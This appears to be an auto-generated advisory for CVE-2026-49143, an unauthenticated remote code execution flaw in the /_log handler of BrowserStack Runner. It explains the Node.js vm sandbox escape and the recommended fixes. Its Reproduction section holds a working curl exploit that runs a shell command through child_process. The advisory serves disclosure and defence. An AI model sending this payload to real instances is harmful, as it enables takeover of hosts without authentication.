CVE-2026-49143
Description
BrowserStack Runner through 0.9.5 contains a remote code execution vulnerability in the /_log HTTP handler that allows unauthenticated network-adjacent attackers to execute arbitrary code by submitting crafted JSON request bodies to the handler, which passes user-supplied data to vm.runInNewContext() combined with eval(). Attackers can escape the Node.js vm sandbox by leveraging a host-context Function reference through util.format to access the host process via this.constructor.constructor, achieving full remote code execution on the underlying system without any authentication.
Affected products
1- Range: <0.9.5
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The _log HTTP handler passes unauthenticated user-supplied data to vm.runInNewContext() combined with eval(), enabling a sandbox escape."
Attack vector
An unauthenticated, network-adjacent attacker can send a crafted JSON request body to the /_log HTTP handler. This handler processes the input using `vm.runInNewContext()` and `eval()`. By leveraging a host-context `Function` reference through `util.format`, an attacker can escape the Node.js vm sandbox via `this.constructor.constructor` to achieve arbitrary code execution on the host system [ref_id=1].
Affected code
The vulnerability resides in the HTTP handler `/`_log` in `lib/server.js` (lines 491–515). Specifically, the code passes user-supplied data to `vm.runInNewContext()` and `eval()` within the `context` object, which includes a reference to `util.format` [ref_id=1].
What the fix does
The advisory recommends removing `eval()` and `vm.runInNewContext()` from the `_log` handler and using `JSON.stringify()` for safe logging instead. Additionally, it suggests adding UUID authentication to the `_log` handler, similar to the `_progress` and `_report` handlers, and binding the HTTP server to `127.0.0.1` instead of `0.0.0.0` to mitigate the vulnerability [ref_id=1].
Preconditions
- networkAttacker must be on the same network as the vulnerable instance.
- authNo authentication is required to exploit the vulnerability.
- inputThe attacker must submit a crafted JSON request body to the /_log endpoint.
Reproduction
# Terminal 1: start the runner echo '<html><body>t</body></html>' > t.html echo '{"username":"X","key":"X","test_path":"t.html","test_framework":"qunit","browsers":[]}' > browserstack.json node bin/runner.js
# Terminal 2: exploit curl -s http://127.0.0.1:8888/_log \ -H "Content-Type: application/json" \ -d '{"arguments":["this.constructor.constructor(\"return process.mainModule.require(\\`child_process\\\`).execSync(\\`id\\\`).toString()\")()"]}'
# Terminal 1 output shows: # [undefined] uid=1000(user) gid=1000(user) ...
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.